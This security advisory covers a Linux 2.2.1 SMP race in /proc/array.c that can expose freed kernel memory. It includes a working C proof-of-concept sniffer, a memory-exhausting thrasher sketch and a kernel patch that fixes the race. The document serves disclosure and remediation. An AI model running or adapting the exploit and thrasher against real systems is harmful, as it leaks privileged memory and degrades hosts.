COMMAND

    kernel

SYSTEMS AFFECTED

    Linux 2.2.1

PROBLEM

    Andrea Arcangeli found the following.  Linux 2.2.1 reintroduced
    an SMP race in fs/proc/array.c: wait(2) can free the kernel stack
    of a zombie process while array.c is still using it.  Once the
    page is freed it can be reused, and if it gets recycled before
    array.c has finished with it, you could reconstruct parts of RAM
    that you should not be allowed to read (by looking at /proc
    data), and array.c itself could run into trouble during its
    lifetime (this last point is unverified, but a reasonable guess).

    In practice the window for the race is small and you would
    probably need at least 3 CPUs to reproduce it.  The first CPU has
    to fork a process that does nothing but _exit(2), then wait until
    the forked process has become a zombie.  Once it is a zombie, a
    /proc sniffer is started on a second CPU, reading
    /proc/<zombiepid>/stat.  The sniffer saves the contents to a
    buffer on the first pass, then rereads /proc/<pid>/stat in a
    loop, comparing each read against the saved sample and logging
    the output of /proc/<pid>/stat whenever it differs from the saved
    data.  Once the sniffer is up to speed (the loop that looks for
    /proc changes is running), the task on the first CPU (the one
    that started the sniffer) calls wait(2) so that the stack of the
    zombie process is released.  Shortly before the wait(2) you must
    eat all the available memory with a memory-thrashing program, and
    this thrasher has to run on yet another CPU (so you need at least
    3-way SMP).  Since the thrasher keeps allocating tons of memory,
    there is a chance that the pages freed by wait(2) will be
    reallocated by the kernel before the read in the /proc sniffer
    finishes.

    It is theoretically possible to sniff kernel data by exploiting
    this /proc race, but it is really hard and only feasible on some
    very parallel hardware.  Andrea also wrote a sample exploit:

    /*
     * Copyright (C) 1999  Andrea Arcangeli
     * Linux-2.2.1 /proc SMP race sniffer
     *
     * Build with -lpthread, e.g.: gcc sniffer.c -o sniffer -lpthread
     */

    #include <stdio.h>
    #include <stdlib.h>		/* exit() */
    #include <string.h>		/* memcpy(), memcmp() */
    #include <unistd.h>		/* read(), close(), lseek(), fork(), usleep() */
    #include <fcntl.h>
    #include <sched.h>
    #include <pthread.h>
    #include <sys/wait.h>	/* wait() */

    static volatile int pid = -1;
    static pthread_mutex_t pid_lock = PTHREAD_MUTEX_INITIALIZER;
    static pthread_mutex_t zombie_lock = PTHREAD_MUTEX_INITIALIZER;

    static int get_current_pid(void)
    {
	    int __pid;
	    pthread_mutex_lock(&pid_lock);
	    __pid = pid;
	    pthread_mutex_unlock(&pid_lock);
	    return __pid;
    }

    static void * sniffer(void *dummy)
    {
	    /* sample[] and length_cmp hold the first snapshot of the
	     * zombie's stat data; they must survive loop iterations */
	    int cache_pid = -1, fd = -1, length_cmp = 0;
	    char str[50], buf[2000], sample[2000];

	    pthread_mutex_lock(&zombie_lock);
	    pthread_mutex_unlock(&zombie_lock);

	    for (;;)
	    {
		    if (get_current_pid() != cache_pid)
		    {
			    pthread_mutex_lock(&zombie_lock);
			    cache_pid = get_current_pid();
			    snprintf(str, 50, "/proc/%d/stat", cache_pid);
			    if (fd > 0)
				    close(fd);
			    fd = open(str, O_RDONLY|O_NONBLOCK);
			    if (fd > 0)
			    {
				    int length;
				    length = read(fd, buf, sizeof(buf));
				    if (length > 0)
				    {
					    length_cmp = length;
					    memcpy(sample, buf, length);
					    sample[length-1] = 0;
				    }
			    }
			    pthread_mutex_unlock(&zombie_lock);
		    }

		    if (fd > 0)
		    {
			    int length;

			    lseek(fd, 0, SEEK_SET);
			    length = read(fd, buf, sizeof(buf));
			    if (length <= 0)
				    continue;
			    buf[length-1] = 0;
			    if (length >= length_cmp && memcmp(buf, sample,
							       length_cmp))
				    printf("length %d, pid %d\n"
					   "original data: %s\n"
					   "modified data: %s\n",
					   length, cache_pid, sample, buf);
		    }
	    }
    }

    static int is_zombie(int __pid)
    {
	    char str[50], state = 0;	/* 0 if the State: line can't be parsed */
	    FILE * status;
	    snprintf(str, 50, "/proc/%d/status", __pid);
	    status = fopen(str, "r");
	    if (!status)
	    {
		    perror("open");
		    exit(2);
	    }
	    fscanf(status, "%*s\t%*s\nState:\t%c", &state);
	    fclose(status);
	    if (state != 'Z')
		    return 0;
	    return 1;
    }

    int main(int argc, char *argv[])
    {
	    int dummy;
	    pthread_t task_struct_sniffer;

	    pthread_mutex_lock(&zombie_lock);

	    if (pthread_create(&task_struct_sniffer, NULL, sniffer, NULL))
	    {
		    perror("pthread_create");
		    exit(1);
	    }

	    for (;;)
	    {
		    int __pid = fork();
		    if (__pid < 0)
		    {
			    perror("fork");
			    exit(3);
		    }
		    if (!__pid)
			    _exit(0);	/* child: exit at once and become a zombie */

		    while (!is_zombie(__pid));	/* busy-wait until the child is a zombie */

		    pthread_mutex_lock(&pid_lock);
		    pid = __pid;
		    pthread_mutex_unlock(&pid_lock);

		    pthread_mutex_unlock(&zombie_lock);
		    usleep(1);
		    wait(&dummy);
		    pthread_mutex_lock(&zombie_lock);
	    }
	    pthread_mutex_unlock(&zombie_lock);
    }
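
    The sample implements only the sniffer thread and the
    fork/zombie/wait(2) sequence; the memory thrasher that has to run
    on the third CPU is left out.  A minimal sketch of such a
    thrasher (our illustration, not part of Andrea's exploit) could
    be:

    /*
     * Memory-thrasher sketch: eat and dirty all available memory so
     * that the kernel stack pages freed by wait(2) get recycled
     * quickly.
     */
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define CHUNK (1 << 20)	/* allocate 1 MB at a time */

    int main(void)
    {
	    for (;;)
	    {
		    char *p = malloc(CHUNK);
		    if (!p)
			    break;	/* allocator exhausted */
		    memset(p, 0xaa, CHUNK);	/* touch every page */
	    }
	    pause();	/* hold on to the memory until killed */
	    return 0;
    }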

SOLUTION

    Andrea hopes to have diffed all the interesting changes from his
    tree to 2.2.1 at the end of this advisory.  If for some reason
    the patch does not apply cleanly or does not work, don't bother
    with it; instead sync with his personal kernel tree, which has
    this race fixed, at

	ftp://e-mind.com/pub/linux/arca-tree/2.2.1_arca-2.gz

    He has now fixed all the races with a zerocopy approach
    (originally suggested by Linus) that increments the page count of
    the pages backing the process's kernel stack instead of copying
    them, and that also makes sure array.c always uses the mm_struct
    it grabbed earlier (with mmget()).  It works fine for him.
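
    In essence, every fixed /proc reader now pins the structures it
    needs before touching them and drops the references afterwards.
    The sketch below is just our consolidated reading of the
    get_env() hunk from the patch that follows (kernel-side code, not
    a standalone program):

    static int get_env(int pid, char * buffer)
    {
	    struct mm_struct *mm;
	    int res = 0;

	    /* grab_mm(): mmget() + down(&mm->mmap_sem), so a wait(2)
	     * on another CPU cannot free the mm under us */
	    mm = grab_mm(pid);
	    if (mm) {
		    res = get_array(mm, mm->env_start, mm->env_end, buffer);
		    /* release_mm(): up(&mm->mmap_sem) + mmput() */
		    release_mm(mm);
	    }
	    return res;
    }

    Patch against 2.2.1: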

    --- /tmp/array.c        Tue Feb  2 00:08:07 1999
    +++ linux/fs/proc/array.c       Mon Feb  1 23:51:51 1999
    @@ -389 +390,30 @@
    -static unsigned long get_phys_addr(struct task_struct * p, unsigned long ptr)
    +/*
    + * Caller must release_mm the mm_struct later.
    + * You don't get any access to init_mm.
    + */
    +static struct mm_struct * grab_mm(int pid)
    +{
    +       struct mm_struct * mm = NULL;
    +       struct task_struct * tsk;
    +
    +       read_lock(&tasklist_lock);
    +       tsk = find_task_by_pid(pid);
    +        /*
    +        * NOTE: this doesn't race because we are protected by the
    +        * big kernel lock. -arca
    +        */
    +       if (tsk && tsk->mm && tsk->mm != &init_mm)
    +               mmget(mm = tsk->mm);
    +       read_unlock(&tasklist_lock);
    +       if (mm)
    +               down(&mm->mmap_sem);
    +       return mm;
    +}
    +
    +static void release_mm(struct mm_struct *mm)
    +{
    +       up(&mm->mmap_sem);
    +       mmput(mm);
    +}
    +
    +static unsigned long get_phys_addr(struct mm_struct *mm, unsigned long ptr)
    @@ -395 +425 @@
    -       if (!p || !p->mm || ptr >= TASK_SIZE)
    +       if (ptr >= TASK_SIZE)
    @@ -398,2 +428,2 @@
    -       if (!p->mm->pgd) {
    -               printk("get_phys_addr: pid %d has NULL pgd!\n", p->pid);
    +       if (!mm->pgd) {
    +               printk(KERN_DEBUG "missing pgd for mm %p\n", mm);
    @@ -403 +433 @@
    -       page_dir = pgd_offset(p->mm,ptr);
    +       page_dir = pgd_offset(mm,ptr);
    @@ -425 +455 @@
    -static int get_array(struct task_struct *p, unsigned long start, unsigned long end, char * buffer)
    +static int get_array(struct mm_struct *mm, unsigned long start, unsigned long end, char * buffer)
    @@ -434 +464 @@
    -               addr = get_phys_addr(p, start);
    +               addr = get_phys_addr(mm, start);
    @@ -456,5 +486,2 @@
    -       struct task_struct *p;
    -
    -       read_lock(&tasklist_lock);
    -       p = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    +       struct mm_struct *mm;
    +       int res = 0;
    @@ -462,3 +489,6 @@
    -       if (!p || !p->mm)
    -               return 0;
    -       return get_array(p, p->mm->env_start, p->mm->env_end, buffer);
    +       mm = grab_mm(pid);
    +       if (mm) {
    +               res = get_array(mm, mm->env_start, mm->env_end, buffer);
    +               release_mm(mm);
    +       }
    +       return res;
    @@ -469 +499,2 @@
    -       struct task_struct *p;
    +       struct mm_struct *mm;
    +       int res = 0;
    @@ -471,6 +502,6 @@
    -       read_lock(&tasklist_lock);
    -       p = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    -       if (!p || !p->mm)
    -               return 0;
    -       return get_array(p, p->mm->arg_start, p->mm->arg_end, buffer);
    +       mm = grab_mm(pid);
    +       if (mm) {
    +               res = get_array(mm, mm->arg_start, mm->arg_end, buffer);
    +               release_mm(mm);
    +       }
    +       return res;
    @@ -725 +707 @@
    -static inline char * task_mem(struct task_struct *p, char *buffer)
    +static inline char * task_mem(struct mm_struct * mm, char *buffer)
    @@ -727,4 +709,2 @@
    -       struct mm_struct * mm = p->mm;
    -
    -       if (mm && mm != &init_mm) {
    -               struct vm_area_struct * vma = mm->mmap;
    +       if (mm) {
    +               struct vm_area_struct * vma;
    @@ -819,0 +800,39 @@
    +static struct task_struct *grab_task(int pid, struct mm_struct ** mm)
    +{
    +       struct task_struct *tsk = current;
    +
    +       *mm = NULL;
    +       read_lock(&tasklist_lock);
    +       tsk = find_task_by_pid(pid);
    +       if (tsk)
    +       {
    +               struct mm_struct * __mm;
    +               struct page * page = mem_map + MAP_NR(tsk);
    +               atomic_inc(&page->count);
    +               /*
    +                * NOTE: this doesn't race because we are protected
    +                * by the big kernel lock. -arca
    +                */
    +               __mm = tsk->mm;
    +               if (__mm && __mm != &init_mm)
    +               {
    +                       mmget(__mm);
    +                       *mm = __mm;
    +               }
    +       }
    +       read_unlock(&tasklist_lock);
    +       if (*mm)
    +               down(&(*mm)->mmap_sem);
    +
    +       return tsk;
    +}
    +
    +static void release_task(struct task_struct *tsk, struct mm_struct * mm)
    +{
    +       if (mm)
    +       {
    +               up(&mm->mmap_sem);
    +               mmput(mm);
    +       }
    +       free_pages((unsigned long) tsk, 1);
    +}
    @@ -825,4 +844,3 @@
    -
    -       read_lock(&tasklist_lock);
    -       tsk = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    +       struct mm_struct * mm;
    +
    +       tsk = grab_task(pid, &mm);
    @@ -833 +851 @@
    -       buffer = task_mem(tsk, buffer);
    +       buffer = task_mem(mm, buffer);
    @@ -835,0 +854 @@
    +       release_task(tsk, mm);
    @@ -841,0 +861 @@
    +       struct mm_struct * mm;
    @@ -846,0 +867 @@
    +       int res;
    @@ -848,3 +869 @@
    -       read_lock(&tasklist_lock);
    -       tsk = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    +       tsk = grab_task(pid, &mm);
    @@ -855,3 +874,4 @@
    -       if (tsk->mm && tsk->mm != &init_mm) {
    -               struct vm_area_struct *vma = tsk->mm->mmap;
    -               while (vma) {
    +       if (mm) {
    +               struct vm_area_struct *vma;
    +
    +               for (vma = mm->mmap; vma; vma = vma->vm_next) {
    @@ -859 +878,0 @@
    -                       vma = vma->vm_next;
    @@ -860,0 +880 @@
    +
    @@ -881 +901 @@
    -       return sprintf(buffer,"%d (%s) %c %d %d %d %d %d %lu %lu \
    +       res = sprintf(buffer,"%d (%s) %c %d %d %d %d %d %lu %lu \
    @@ -907 +927 @@
    -               tsk->mm ? tsk->mm->rss : 0, /* you might want to shift this left 3 */
    +               mm ? mm->rss : 0, /* you might want to shift this left 3 */
    @@ -909,3 +929,3 @@
    -               tsk->mm ? tsk->mm->start_code : 0,
    -               tsk->mm ? tsk->mm->end_code : 0,
    -               tsk->mm ? tsk->mm->start_stack : 0,
    +               mm ? mm->start_code : 0,
    +               mm ? mm->end_code : 0,
    +               mm ? mm->start_stack : 0,
    @@ -925,0 +946,3 @@
    +
    +       release_task(tsk, mm);
    +       return res;
    @@ -1003 +1025,0 @@
    -       struct task_struct *tsk;
    @@ -1004,0 +1027 @@
    +       struct mm_struct *mm;
    @@ -1006,7 +1029,3 @@
    -       read_lock(&tasklist_lock);
    -       tsk = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    -       if (!tsk)
    -               return 0;
    -       if (tsk->mm && tsk->mm != &init_mm) {
    -               struct vm_area_struct * vma = tsk->mm->mmap;
    +       mm = grab_mm(pid);
    +       if (mm) {
    +               struct vm_area_struct * vma = mm->mmap;
    @@ -1015 +1034 @@
    -                       pgd_t *pgd = pgd_offset(tsk->mm, vma->vm_start);
    +                       pgd_t *pgd = pgd_offset(mm, vma->vm_start);
    @@ -1032,0 +1052 @@
    +               release_mm(mm);
    @@ -1070 +1089,0 @@
    -
    @@ -1074 +1093,2 @@
    -       struct task_struct *p;
    +       struct task_struct * p;
    +       struct mm_struct * mm;
    @@ -1079 +1098,0 @@
    -       int volatile_task;
    @@ -1091,3 +1110 @@
    -       read_lock(&tasklist_lock);
    -       p = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    +       p = grab_task(pid, &mm);
    @@ -1097 +1114 @@
    -       if (!p->mm || p->mm == &init_mm || count == 0)
    +       if (!mm || count == 0)
    @@ -1100,3 +1116,0 @@
    -       /* Check whether the mmaps could change if we sleep */
    -       volatile_task = (p != current || atomic_read(&p->mm->count) > 1);
    -
    @@ -1108 +1122 @@
    -       for (map = p->mm->mmap, i = 0; map && (i < lineno); map = map->vm_next, i++)
    +       for (map = mm->mmap, i = 0; map && (i < lineno); map = map->vm_next, i++)
    @@ -1179,6 +1192,0 @@
    -
    -               /* By writing to user space, we might have slept.
    -                * Stop the loop, to avoid a race condition.
    -                */
    -               if (volatile_task)
    -                       break;
    @@ -1190,0 +1199 @@
    +       release_task(p, mm);
    @@ -1202 +1211,2 @@
    -       struct task_struct * tsk = current ;
    +       struct task_struct * tsk;
    +       struct mm_struct * mm;
    @@ -1205,6 +1215,2 @@
    -       read_lock(&tasklist_lock);
    -       if (pid != tsk->pid)
    -               tsk = find_task_by_pid(pid);
    -       read_unlock(&tasklist_lock);    /* FIXME!! This should be done after the last use */
    -
    -       if (tsk == NULL)
    +       tsk = grab_task(pid, &mm);
    +       if (!tsk)
    @@ -1223,0 +1230 @@
    +       release_task(tsk, mm);